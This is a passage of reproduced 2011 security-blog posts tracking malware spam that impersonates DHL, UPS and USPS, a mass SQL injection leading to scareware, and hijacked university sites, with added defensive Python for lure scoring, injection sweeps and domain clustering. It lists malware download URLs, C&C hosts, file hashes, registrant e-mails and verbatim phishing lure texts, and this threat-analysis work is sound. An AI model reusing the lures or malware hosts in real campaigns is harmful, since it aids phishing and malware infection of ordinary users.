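        reasons.append(f"{hits} template phrase(s) in body")
    for name, inner in msg["attachments"]:
        if EXECUTABLE.search(name):
            reasons.append(f"executable attachment {name}")
        elif ARCHIVE.search(name) and any(EXECUTABLE.search(n) for n in inner):
            reasons.append(f"archive {name} wraps an executable")
    sender_domain = msg["from"].rsplit("@", 1)[-1].lower()
    for brand, domain in BRAND_DOMAINS.items():
        claims = re.search(rf"\b{re.escape(brand)}\b", msg["subject"], re.I)
        legit = sender_domain == domain or sender_domain.endswith("." + domain)
        if claims and not legit:
            reasons.append(f"claims {brand} but sent from {sender_domain}")
            break
    return len(reasons), reasons


def is_lure(msg, threshold=3):
    """Three independent signals is the (assumed) cut-off: subject or body
    alone also match real courier mail, the attachment and sender checks do not."""
    return score_message(msg)[0] >= threshold


# Constructed samples. DHL_LURE reproduces the text quoted in the post; the
# sender address is an assumption, the post does not give one.
DHL_LURE = {
    "from": "notify@dhl-parcel-info.net",
    "subject": "DHL notification #4419263",
    "body": ("Dear customer. The parcel was send your home address. And it will "
             "arrice within 7 bussness day. More information and the tracking "
             "number are attached in document below. Thank you. 2011 DHL "
             "International GmbH. All rights reserverd"),
    "attachments": [("document.zip", ["DHL_notification.exe"])],
}
BENIGN_NOTICE = {
    "from": "tracking@fedex.com",
    "subject": "FedEx shipment 7712 has been delivered",
    "body": "Your package was delivered today. View delivery details online.",
    "attachments": [("delivery-receipt.pdf", [])],
}

if __name__ == "__main__":
    for label, msg in (("lure", DHL_LURE), ("benign", BENIGN_NOTICE)):
        score, reasons = score_message(msg)
        print(f"{label}: score={score} lure={is_lure(msg)} {reasons}")
```

The sender check is deliberately last and counts once: spammers rotate throwaway sending domains, so it only confirms what the template and the attachment already show. In a mail gateway the archive inspection would open the zip or rar rather than trust a listing, and the attachment names from the other posts (UPSnotify.rar, Post_Express_Label_ID_*.zip) can be fed straight into the same function.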
3. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notification-malware.html
4. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html
5. http://ddanchev.blogspot.com/
Compromised Universities Lead to Fraudulent Pharmaceutical Ads (2011-03-16 19:30)

[1]

Continuing the "[2]Compromised University Leads to Fraudulent Pharmaceutical Ads" and "[3]Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads" series, in this post we'll discuss two more compromised web servers of educational institutions leading to pharmaceutical ads. The affected universities are:

Rutgers Energy Institute:

ruei.rutgers.edu/documents/chin.php?adv=cialis20-mg
ruei.rutgers.edu/documents/chin.php?adv=viagra-ratings
ruei.rutgers.edu/documents/chin.php?adv=viagra-999
ruei.rutgers.edu/documents/chin.php?adv=viagra-expired
ruei.rutgers.edu/documents/chin.php?adv=viagra-kako-se

Uploaded redirectors:

ruei.rutgers.edu/documents/chin.php
ruei.rutgers.edu/documents/roar.php
ruei.rutgers.edu/documents/ost.php

Computer Music Center at Columbia University:

music.columbia.edu/cmc/pills/index.php?adv=how-to-try-viagra
music.columbia.edu/cmc/pills/index.php?adv=damaskviagra
music.columbia.edu/cmc/pills/index.php?adv=brandlevitra
music.columbia.edu/cmc/pills/index.php?adv=vegetalviagra
music.columbia.edu/cmc/pills/index.php?adv=vviagra

[4]

The sampled URLs redirect to the following fraudulent pharmaceutical sites:

pillsedonline.com - 93.170.104.53 - Email: stavros1929@hotmail.com; stavroscomodromos@yahoo.com
buyperfecthealth.com - 93.170.104.53 - Email: stavros1929@hotmail.com
safedrugstock.com - 93.170.104.53 - Email: stav

ros1929@hotmail.com
securedrugstock.com - 93.170.104.53 - Email: stavros1929@hotmail.com
europharmas.com - 93.170.104.53 - Email: glockner546@hotmail.com
requestpills.com - 93.170.104.53 - Email: stavros1929@hotmail.com; stavroscomodromos@yahoo.com
online-doc.us - 93.170.104.53 - Email: cool_gamer90@mail.ru
pills4sex.eu - 93.170.104.53
securetablets.com - 93.170.104.53 - Email: stavros1929@hotmail.com
alledtablets.com - 93.170.104.53 - Email: stavros1929@hotmail.com; stavroscomodromos@yahoo.com
canadian-refills.com - 178.239.60.214 - Email: privacy-829911@domainprivacygroup.com

Cybercriminals continue purchasing web shells and stolen FTP credentials for high-PageRank web sites such as those of educational institutions. Monitoring of their operations will continue.
Spamvertised United Parcel Service notifications serve malware (2011-03-23 15:54)

[1]

A currently ongoing spam campaign is impersonating UPS for malware-serving purposes.

Sample subject: United Parcel Service notification

Sample attachments: UPSnotify.rar; UPSnotify.exe; UnitedParcelServicedocument.exe

Sample message: Dear customer. The parcel was sent your home address. And it will arrive within 7 business day. More information and the tracking number are attached in document below. Thank you. © 1994-2011 United Parcel Service of America, Inc.

Detection rates:

UnitedParcelServicedocument.exe - [2]Mal/Bredo-K - Result: 7/41 (17.1 %)
MD5: b60e95b42106989bc39e175efcc031db
SHA1: 0fb63dff83db643c9ee42efe617bdd539a5ffb8f
SHA256: 65f14438c3154a74767131a427fbdc50c28a6cbcdcf47f3d418b92c4c168696a

UPSnotify.exe - [3]Mal/Bredo-K - Result: 17/40 (42.5 %)
MD5: cc040e69121bc19f23ef4a32dbb8a80e
SHA1: da65b7b277540b88918076949a28e8307ad7e41a
SHA256: ef5f76e1b20c2083469fbe7e4de4ec9c06689ee105274b1a79c9cadbd23d54ae

Upon execution downloads additional binaries from:

193.105.121.33/lol2.exe
193.105.121.33/pod.exe
193.105.121.33/spm.exe

Responding to 193.105.121.33 are undeardarling.com - Email: admin@undearhappydear.com and undearhappydear.com - Email: admin@undearhappydear.com

Detection rates:

lol2.exe - [4]Trojan.FakeAV!gen39 - Result: 14/43 (32.6 %)
MD5: 747431a2a4a29f1bfc136e674af99ad0
SHA1: 8349fc3f5f299d0ca6473e748276ec2b50019330
SHA256: 6009e7f5cbc55e6acb060d9fb33a39a978168a32a0a8c6a24f201106056cc0db

pod.exe - [5]Backdoor.Win32.GbotMK - Result: 33/42 (78.6 %)
MD5: f403afdbe4c4c859c8ab018a7ded694c
SHA1: 1915a46cbb43fcaf8da90af95856d7524b24f129
SHA256: eddfff99df316669191be0b61a5ae06ee811bbd27110111e69cbd212881fa494

Upon execution phones back to:

healthylifenow.com - 208.109.223.193 - Email: HEALTHYLIFENOW.COM@domainsbyproxy.com
bigbeerclubonline.com - Email: contact@privacyprotect.org
zonetf.com - 96.9.169.85 - Email: janeob@126.com

spm.exe - [6]W32.Pilleuz - Result: 10/42 (23.8 %)
MD5: de55498b9f9195f1733df62c7026cf5f
SHA1: 5520c1220cdd03a64f9b782c2393697ebab154b9
SHA256: dc2a797e5be968f9d36d4510988fa242c042a3e315fb50a3f9325cae6a1d779d

Upon execution phones back to:

ponel.biz - 46.4.62.17 - Email: web_raskrutka@pochta.ru
itisformebaby.biz - 46.4.10.7; 88.198.46.151; 178.63.63.208 - Email: web_raskrutka@pochta.ru
gmail.com
yahoo.com
hotmail.com

As speculated, cybercriminals have started feeding legitimate sites into their C&C communication patterns in an attempt to undermine community efforts aimed at tracking their malicious activities: a blocklist built naively from observed callbacks would now include gmail.com, yahoo.com and hotmail.com.

Related posts:

[7] Spamvertised FedEx Notifications Spread Malware
[8] Spamvertised DHL Notification Malware Campaign
[9] More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [10]Dancho Danchev's blog.

1. https://lh3.googleusercontent.com/-OggZi8-viHU/TYn2AwAWs6l/AAAAAAAAE20/Ct8GpwYkPkU/s1600/ups-logo.jpg
2. http://www.virustotal.com/file-scan/report.html?id=65f14438c3154a74767131a427fbdc50c28a6cbcdcf47f3d418b92c4c168696a-1300983540
3. http://www.virustotal.com/file-scan/report.html?id=ef5f76e1b20c2083469fbe7e4de4ec9c06689ee105274b1a79c9cadbd23d54ae-1300884778
4. http://www.virustotal.com/file-scan/report.html?id=6009e7f5cbc55e6acb060d9fb33a39a978168a32a0a8c6a24f201106056cc0db-1300884822
5. http://www.virustotal.com/file-scan/report.html?id=eddfff99df316669191be0b61a5ae06ee811bbd27110111e69cbd212881fa494-1300884591
6. http://www.virustotal.com/file-scan/report.html?id=dc2a797e5be968f9d36d4510988fa242c042a3e315fb50a3f9325cae6a1d779d-1300884605
7. http://ddanchev.blogspot.com/2011/03/spamvertised-fedex-notifications-spread.html
8. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notification-malware.html
9. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html
10. http://ddanchev.blogspot.com/
Spamvertised Post Office Express Mail (USPS) Emails Serving Malware (2011-03-25 18:20)

[1] 

A currently spamvertised malware campaign is impersonating the USPS for malware-serving purposes.

Sample subject: Post Express Information. Your package is available for pick up. NR[random number]

Sample attachment: Post_Express_Label_ID_[random number].zip; Post_Express_Label.exe

Sample message:

Dear client, Email notice number.[random number]. Your package has been returned to the Post Express office. The reason of the return is "Error in the delivery address" Important message! Attached to the letter mailing label contains the details of the package delivery. You have to print mailing label, and come in the Post Express office in order to receive the packages! Thank you for using our services. Post Express Support.

Detection rate:

Post_Express_Label.exe - [2]Medium Risk Malware Dropper - Result: 1/41 (2.4 %)
MD5: 3c05dd68ee0bfb9b290b9c034f836833
SHA1: 8a1a00da04c96c8e67b9921652de60463118ea9f
SHA256: 57d58165c79158a42c3e45670aa4176aaae393f371188f91d0ac46022bd3e7c0

[3] 
Upon execution phones back to:

mialepromo.ru/7Pe80Rolxs/document.doc
mialepromo.ru/7Pe80Rolxs/load.php?file=0
mialepromo.ru/7Pe80Rolxs/load.php?file=1
mialepromo.ru/7Pe80Rolxs/load.php?file=2
mialepromo.ru/7Pe80Rolxs/load.php?file=3
mialepromo.ru/7Pe80Rolxs/load.php?file=4
mialepromo.ru/7Pe80Rolxs/load.php?file=5
mialepromo.ru/7Pe80Rolxs/load.php?file=6
mialepromo.ru/7Pe80Rolxs/load.php?file=7
mialepromo.ru/7Pe80Rolxs/load.php?file=8
mialepromo.ru/7Pe80Rolxs/load.php?file=9
mialepromo.ru/7Pe80Rolxs/load.php?file=uploader
mialepromo.ru/7Pe80Rolxs/load.php?file=grabbers

mialepromo.ru - 89.208.149.204 (AS12695); 109.94.220.51 (AS47860); 109.94.220.50 (AS47860); 91.199.75.77 (AS44301); 178.17.164.131 (AS43289); 193.22.81.104 (AS28920) - Email: salam@ica.org

Monitoring of the campaign is ongoing.

Related posts:

[4] Spamvertised United Parcel Service notifications serve malware
[5] Spamvertised FedEx Notifications Spread Malware
[6] Spamvertised DHL Notification Malware Campaign
[7] More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [8]Dancho Danchev's blog.

8. http://ddanchev.blogspot.com/
Dissecting the Massive SQL Injection Attack Serving Scareware (2011-03-31 19:54)

A currently ongoing massive SQL injection attack has affected hundreds of thousands of web pages across the Web, to ultimately monetize the campaign through a scareware affiliate program. Such massive SQL injection attempts are usually conducted using [1]mass vulnerability scanning tools, with the help of [2]search engines which have already [3]crawled the vulnerable sites.

What's particularly interesting about this campaign is the fact that the domains used are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis. Let's dissect the campaign, expose the domain portfolios and the entire campaign structure.
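
The injected URLs this campaign plants all end in /ur.php. As an added example in Python (not code from the original post), the sweep below scans text dumped from a site's database for the injected reference; it assumes the payload is an HTML script tag whose src points at a host's /ur.php, the sample rows are constructed, and the known-host set is copied from the injected URLs listed in this post.

```python
"""Sweep stored content for script tags that point at the campaign's ur.php hosts.

Added example, not code from the original post. It assumes the injected
payload is an HTML <script> tag whose src ends in /ur.php; the rows are
constructed sample data and KNOWN_UR_HOSTS is copied from the domains
named in the post.
"""
import re
from typing import Iterable, List, Tuple

# Hosts copied from the post's "SQL injected URLs"; unknown ur.php hosts are
# still flagged, so a newly rotated domain does not slip through.
KNOWN_UR_HOSTS = {
    "lizamoon.com", "alexblane.com", "alisa-carter.com",
    "t6ryt56.info", "tadygus.com", "worid-of-books.com",
}

# Matches <script src=http://host/ur.php>, with or without quotes and scheme.
SCRIPT_SRC_UR = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*(?:https?:)?//([^/\"'\s>]+)/ur\.php",
    re.IGNORECASE,
)

Finding = Tuple[str, str, bool]   # (row id, injected host, host already known)


def find_injected_hosts(text: str) -> List[str]:
    """Return the hosts referenced by injected ur.php script tags in one value."""
    return [m.group(1).lower() for m in SCRIPT_SRC_UR.finditer(text)]


def sweep_rows(rows: Iterable[Tuple[str, str]]) -> List[Finding]:
    """Scan (row_id, text) pairs, e.g. dumped from every text column of a
    site's database, and report each injected reference together with
    whether its host is one already published for the campaign."""
    findings: List[Finding] = []
    for row_id, text in rows:
        for host in find_injected_hosts(text):
            findings.append((row_id, host, host in KNOWN_UR_HOSTS))
    return findings


# Constructed sample rows: two clean, three carrying an injected tag
# (new-stats77.info is a made-up placeholder for a not-yet-listed host).
SAMPLE_ROWS = [
    ("products:17", "Blue widget</title><script src=http://lizamoon.com/ur.php></script>"),
    ("products:18", "Red widget, 2 kg, ships in 3 days"),
    ("news:3", '<p>Opening hours</p><script src="//alisa-carter.com/ur.php"></script>'),
    ("news:4", "<script src='/js/site.js'></script>"),
    ("news:9", "Sale!</title><SCRIPT SRC='HTTP://new-stats77.info/UR.PHP'></SCRIPT>"),
]

if __name__ == "__main__":
    for row_id, host, known in sweep_rows(SAMPLE_ROWS):
        print(f"{row_id}: injected reference to {host} ({'known' if known else 'NEW'} host)")
```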

UPDATED: Related SQL injected URLs [4]courtesy of WebSense.

SQL injected URLs:

lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com
t6ryt56.info/ur.php (18 results) - Email: support@ruler-domains.com
tadygus.com/ur.php (100 results) - Email: jamesnorthone@hotmailbox.com
worid-of-books.com/ur.php (334,000 results) - Email: tik0066@gmail.com



Upon successful redirection, the campaign attempts to load the scareware domain defender-nibea.in/scanlb/237 - 46.252.130.200 - Email: jimwei2969@gmail.com

Detection rate:

freesystemscan.exe - [5]Trojan/Win32.FakeAV - Result: 9/41 (22.0 %)
MD5: 815d77f8fca509dde1abeafabed30b65
SHA1: 1b3c35afb76c53cd9507fffee46fb58c29e72bc1
SHA256: cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c

Responding to 46.252.130.200 (AS25190; KIS-AS UAB "Kauno Interneto Sistemos") are also a portfolio of antivirus-*.co.cc, defender-*.in, movie-*.in and system-scanner-*.co.cc scareware domains.

Rotated scareware domains involved in the campaign are responding to 84.123.115.228 (AS6739; ONO-AS Cableuropa - ONO).

The scareware domains have been registered using automatically registered email accounts at Gmail, as a precaution in an attempt to make it harder to expose the campaign by using a single email only.
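
One way to act on the two observations above (shared IPs, one throwaway Gmail account per domain), as an added Python example that is not the post's own code: link domains that share a resolved IP or a registrant e-mail and count how many infrastructure clusters the rotated accounts really hide. The records are copied from indicators published in this post, the decoy gmail.com entry mirrors the Pilleuz sample's legitimate-site callbacks described earlier on this page, and the benign allowlist is an assumption.

```python
"""Infrastructure pivoting over published campaign indicators.

Added example, not code from the original post: it shows why rotating one
throwaway registrant e-mail per domain does not hide a campaign whose
domains all answer on the same IPs. Domains are joined into one cluster
when they share a resolved IP or a registrant e-mail (union-find), after
known-benign decoy hosts are dropped. The sample records are copied from
the indicators listed in this post; the allowlist is an assumption.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

Record = Tuple[str, List[str], Optional[str]]   # (domain, resolved IPs, registrant e-mail)

# Decoy hosts that show up in C&C traffic only to pollute indicator lists
# (assumed allowlist; extend it from your own telemetry).
BENIGN_HOSTS: Set[str] = {"gmail.com", "yahoo.com", "hotmail.com"}

# Sample observations copied from the post (IPs and e-mails as published there).
SAMPLE_RECORDS: List[Record] = [
    ("lizamoon.com", ["91.220.35.151", "91.213.29.182"], "jamesnorthone@hotmailbox.com"),
    ("alisa-carter.com", [], "jamesnorthone@hotmailbox.com"),
    ("agasi-story.info", ["91.217.162.45"], "tik0066@gmail.com"),
    ("eva-marine.info", ["109.236.81.28"], "tik0066@gmail.com"),
    ("defender-nibea.in", ["46.252.130.200"], "jimwei2969@gmail.com"),
    ("defender-thga.in", ["46.252.130.200", "84.123.115.228"], "youngantonio6055@gmail.com"),
    ("defender-gnva.in", ["46.252.130.200", "84.123.115.228"], "ananddaher7294@gmail.com"),
    ("defender-abcc.in", ["84.123.115.228"], "rubysmart5057@gmail.com"),
    ("gmail.com", [], None),   # decoy callback, as in the Pilleuz sample
]


class _UnionFind:
    """Minimal disjoint-set structure keyed by domain name."""

    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, x: str) -> str:
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_infrastructure(records: Iterable[Record],
                           benign: Set[str] = BENIGN_HOSTS) -> List[Set[str]]:
    """Return clusters of domains linked by a shared IP or registrant e-mail.

    Decoy hosts in `benign` are ignored entirely, so a legitimate site fed
    into the C&C traffic cannot glue unrelated clusters together. Clusters
    come back largest first, ties broken by their lowest domain name.
    """
    uf = _UnionFind()
    first_seen: Dict[str, str] = {}     # pivot value -> first domain carrying it
    for domain, ips, email in records:
        if domain in benign:
            continue
        uf.find(domain)                 # register even when it has no pivots
        pivots = [f"ip:{ip}" for ip in ips]
        if email:
            pivots.append(f"email:{email.lower()}")
        for pivot in pivots:
            if pivot in first_seen:
                uf.union(first_seen[pivot], domain)
            else:
                first_seen[pivot] = domain
    groups: Dict[str, Set[str]] = defaultdict(set)
    for domain in list(uf.parent):
        groups[uf.find(domain)].add(domain)
    return sorted(groups.values(), key=lambda s: (-len(s), min(s)))


def distinct_emails(records: Iterable[Record]) -> int:
    """Number of registrant e-mails used; compare it with the cluster count."""
    return len({email.lower() for _, _, email in records if email})


if __name__ == "__main__":
    clusters = cluster_infrastructure(SAMPLE_RECORDS)
    print(f"{distinct_emails(SAMPLE_RECORDS)} registrant e-mails collapse to "
          f"{len(clusters)} infrastructure clusters")
    for members in clusters:
        print("  ", ", ".join(sorted(members)))
```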

Monitoring of the campaign is ongoing.

Related posts:

• [6]SQL Injection Through Search Engines Reconnaissance
• [7]Massive SQL Injections Through Search Engine's Reconnaissance - Part Two
• [8]Massive SQL Injection Attacks - the Chinese Way
• [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service
• [10]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware
• [11]Dissecting the WordPress Blogs Compromise at Network Solutions
• [12]Yet Another Massive SQL Injection Spotted in the Wild
• [13]Smells Like a Copycat SQL Injection In the Wild
• [14]Fast-Fluxing SQL Injection Attacks
• [15]Obfuscating Fast-fluxed SQL Injected Domains

This post has been reproduced from [16]Dancho Danchev's blog.

1. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html
2. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html
3. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html
4. http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
5. http://www.virustotal.com/file-scan/report.html?id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c-1301586582
6. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html
7. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html
8. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html
9. http://ddanchev.blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.html
10. http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html
11. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html
12. http://ddanchev.blogspot.com/2008/05/yet-another-massive-sql-injection.html
13. http://ddanchev.blogspot.com/2008/07/smells-like-copycat-sql-injection-in.html
14. http://ddanchev.blogspot.com/2008/05/fast-fluxing-sql-injection-attacks.html
15. http://ddanchev.blogspot.com/2008/07/obfuscating-fast-fluxed-sql-injected.html
16. http://ddanchev.blogspot.com/

1.4 April

Spamvertised DHL Notifications Scareware Campaign (2011-04-04 16:44)

Yet another currently spamvertised campaign is impersonating DHL for scareware-serving purposes.

Sample subjects: DHL notification #random number

Sample message: Dear customer! The parcel was send your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in document below. Thank you. 2011 DHL International GmbH. All rights reserverd.

Sample filenames: DHL_tracking.zip; doc.zip; dhl.zip

Detection rates:

dhl.exe - [1]Backdoor:Win32/Hostil.gen!A - Result: 22/40 (55.0 %)
MD5: 87d778169ae14d934b92ce628b5cfde4
SHA1: 20787fde3b7fde64cc3892c4df9a4eb2a2515830
SHA256: 6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a760f4eb983d76007d3fe54

Downloads additional binary from puskovayaustanovka.ru/pusk2.exe - 46.161.20.66 - Email: admin@puskovayaustanovka.ru

pusk2.exe - [2]Trojan.Fakealert.20509 - Result: 11/41 (26.8 %)
MD5: a9be091eedea947f8626d11042e0d9be
SHA1: 9c1d399d47a6ef6081553a101ab48fca61859db4
SHA256: d4f5802a392c0851d5e19118d56cc8b578f1a07085aa5772cbdcf484608ed094



Upon execution phones back to a portfolio of .com domains registered through throwaway ca4.ru, free-id.ru, bz3.ru, yourisp.ru, cheapbox.ru and ppmail.ru addresses.

Domains are responding to the following ASs: AS18866; AS32097.
Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised Post Office Express Mail (USPS) Emails Serving Malware

[4] Spamvertised United Parcel Service notifications serve malware

[5] Spamvertised FedEx Notifications Spread Malware

[6] Spamvertised DHL Notification Malware Campaign

[7] More Spamvertised DHL Notifications Spread Malware

1. http://www.virustotal.com/file-scan/report.html?id=6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a760f4eb983d76007d3fe54-1301924841

2. http://www.virustotal.com/file-scan/report.html?id=d4f5802a392c0851d5e19118d56cc8b578f1a07085aa5772cbdcf484608ed094-1301925356

3. http://ddanchev.blogspot.com/2011/03/spamvertised-post-office-express-mail.html

4. http://ddanchev.blogspot.com/2011/03/spamvertised-united-parcel-service.html

5. http://ddanchev.blogspot.com/2011/03/spamvertised-fedex-notifications-spread.html

6. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notification-malware.html

7. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html

Summarizing Zero Day's Posts for March (2011-04-04 18:56)

The following is a brief summary of all of my posts at ZDNet's Zero Day for March. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:
Recommended reading: 

• [3] Dear ISP, it's time to quarantine your malware-infected 
customers 

• [4] Zombie PC Prevention Bill to make security software 
mandatory 
01. [5]Spamvertised 'You have received a gift from one of our members!' malware campaign

02. [6]Report: malicious PDF files becoming the attack 
vector of choice 

03. [7]Ashton Kutcher's Twitter account hacked 

04. [8]Google tops comparative review of malicious search 
results - again 

05. [9]Report: 3 million malvertising impressions served per 
day 

06. [10]Dear ISP, it's time to quarantine your malware- 
infected customers 

07. [11]SpyEye gets new DDoS functionality

08. [12]Spamvertised DHL notifications lead to malware 

09. [13]Spamvertised FedEx notifications lead to malware 

10. [14]Rustock botnet's operations disrupted 

11. [15]Malicious Japan quake spam leads to scareware 



12. [16]Spamvertised United Parcel Service notifications 
lead to malware 

13. [17]Researchers release details on 34 SCADA 
vulnerabilities 

14. [18]Zombie PC Prevention Bill to make security software 
mandatory 

15. [19]Spamvertised Post Office Express Mail (USPS) 
emails lead to malware 

16. [20]New GpCode ransomware encrypts files, demands 
$125 for decryption 

17. [21]Mass SQL injection attack leads to scareware 

This post has been reproduced from [22]Dancho Danchev's blog. Follow him [23]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/dear-isp-its-time-to-quarantine-your-malware-infected-customers/6712

4. http://www.zdnet.com/blog/security/zombie-pc-prevention-bill-to-make-security-software-mandatory/8487

5. http://www.zdnet.com/blog/security/spamvertised-you-have-received-a-gift-from-one-of-our-members-malware-campaign/8250

6. http://www.zdnet.com/blog/security/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/8255

7. http://www.zdnet.com/blog/security/ashton-kutchers-twitter-account-hacked/8280

8. http://www.zdnet.com/blog/security/google-tops-comparative-review-of-malicious-search-results-again/8306

9. http://www.zdnet.com/blog/security/report-3-million-malvertising-impressions-served-per-day/8319

10. http://www.zdnet.com/blog/security/dear-isp-its-time-to-quarantine-your-malware-infected-customers/6712

11. http://www.zdnet.com/blog/security/spyeye-gets-new-ddos-functionality/8381

12. http://www.zdnet.com/blog/security/spamvertised-dhl-notifications-lead-to-malware/8415

13. http://www.zdnet.com/blog/security/spamvertised-fedex-notifications-lead-to-malware/8452

14. http://www.zdnet.com/blog/security/rustock-botnets-operations-disrupted/8456

15. http://www.zdnet.com/blog/security/malicious-japan-quake-spam-leads-to-scareware/8463

16. http://www.zdnet.com/blog/security/spamvertised-united-parcel-service-notifications-lead-to-malware/8478

17. http://www.zdnet.com/blog/security/researchers-release-details-on-34-scada-vulnerabilities/8483

18. http://www.zdnet.com/blog/security/zombie-PC-prevention-bill-to-make-security-software-mandatory/8487

19. http://www.zdnet.com/blog/security/spamvertised-post-office-express-mail-usps-emails-lead-to-malware/8502

20. http://www.zdnet.com/blog/security/new-gpcode-ransomware-encrypts-files-demands-125-for-decryption/8505

21. http://www.zdnet.com/blog/security/mass-sql-injection-attack-leads-to-scareware/8510

22. http://ddanchev.blogspot.com/

23. http://twitter.com/danchodanchev

Don't Play Poker on an Infected Table - Part Four (2011-04-11 18:10)

A currently spamvertised campaign is enticing users into downloading and executing a fraudulent online gambling application known as VegasVIP_setup.exe.

Detection rate: 

VegasVIP_setup.exe - [1]Win32/CazinoSilver - Result: 16/42 (38.1 %)

MD5: 8680fa2868dd068f3c1d3995df105243

SHA1: 4f3ecd72c223cf6e130377a3ecd9149232dc848b

SHA256: 68ded50bf7c9b7f6961e6334b25fdad5d2369e461051d5a9fa1f1ebaadeb1d0e

Upon execution, the sample phones back to:

www.onlinevegas.com/download/update.php?dl=0af374526b7b6eb6c54bf92cb1d1a236&status=10

The spammers are earning revenue by participating in the BestCasinoPartner.com Affiliate Program. More details:

"Turn Your Traffic Into BIG Monthly Cash! Join the BestCasinoPartner.com Affiliate Program and from the very start you will earn a HUGE 30 % of ALL player GROSS losses EVERY month, no matter what your volume is! That's ALL player GROSS losses for the life of your referred players, with No Loss Carry-Forward!

Refer an Affiliate: Get Even More. Earn 7 % override on the Casino Gross Revenue payment made to the referred Affiliate for all players referred by your directly referred Affiliates - for the life of the player! Earn 5 % override on the Casino Gross Revenue payment made from your Web masters' referrals! AND... we even go One Step Further - a THIRD tier!

Here are the THREE levels that will earn you profits for the life of EACH player:

• Tier 1: 7 % override on the Casino Gross Revenue

• Tier 2: 5 % override on the Casino Gross Revenue

• Tier 3: 3 % override on the Casino Gross Revenue"

Participating affiliate domains are: OnlineVegas.com; 
GoCasino.com; CrazySlots.com and GrandVegas.com 

Related fraudulent online gambling domains part of the 
campaign: 


Related posts: 

[2] Don't Play Poker on an Infected Table - Part Three 

[3] Don't Play Poker on an Infected Table - Part Two 

[4] Don't Play Poker on an Infected Table 

This post has been reproduced from [5]Dancho Danchev's blog. Follow him [6]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=68ded50bf7c9b7f6961e6334b25fdad5d2369e461051d5a9fa1f1ebaadeb1d0e-1302535749

2. http://ddanchev.blogspot.com/2010/03/dont-play-poker-on-infected-table-part.html

3. http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html

4. http://ddanchev.blogspot.com/2007/09/dont-play-poker-on-infected-table.html

5. http://ddanchev.blogspot.com/

6. http://twitter.com/danchodanchev
Spamvertised "Reqest Rejected" Campaign Serving Scareware (2011-04-12 20:22)

A currently spamvertised scareware-serving campaign is enticing end users into downloading and executing a malicious binary, which drops a scareware variant.

Sample subject: Reqest rejected

Sample message: "Dear Sirs, Thank you for your letter! Unfortunately we can not confirm your request! More information attached in document below. Thank you Best regards."

Sample attachments: EX-38463.pdf.zip; EX-38463.pdf.exe


Detection rate:

EX-38463.pdf.exe - [1]TrojanDownloader:Win32/Chepvil.J - Result: 11/41 (26.8 %)

MD5: 5085794e6c283ebcfa3878805b9e7be7

SHA1: 1fbd8d3b0a3479274d8f09543452bf724bcb245c

SHA256: c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932

Upon execution downloads hdjfskh.net/pusk.exe - 208.43.90.48 - Email: admin@firtryt.biz

Detection rate: 

pusk.exe - [2]FakeAlert-CN.gen.aa - Result: 13/42 (31.0 %)

MD5: a50a91176b5aeb96b8b77b99d587c485

SHA1: c56b7ab2123dbd49902446ffcc0cf59d6a865857

SHA256: c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aac0d6cf61e83c
Upon execution phones back to the following domains and ASs:

Phones back to: AS19875; AS8001; AS24940; AS32475; AS32097; AS19875



Monitoring of the campaign is ongoing. 
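The same registrant e-mails and hosts recur between this campaign's phone-back list and the one in the earlier post above, which is how such campaigns get tied together. As an added example (not the blog's own tooling), the script below parses lines in the "domain - IP - Email: address" form these posts use and reports the domains, IPs and registrant e-mails two lists share; the sample lines are copied from the two lists in the posts.

```python
import re
from collections import defaultdict

# Lines in the posts take the form "domain[/path] - IP - Email: address";
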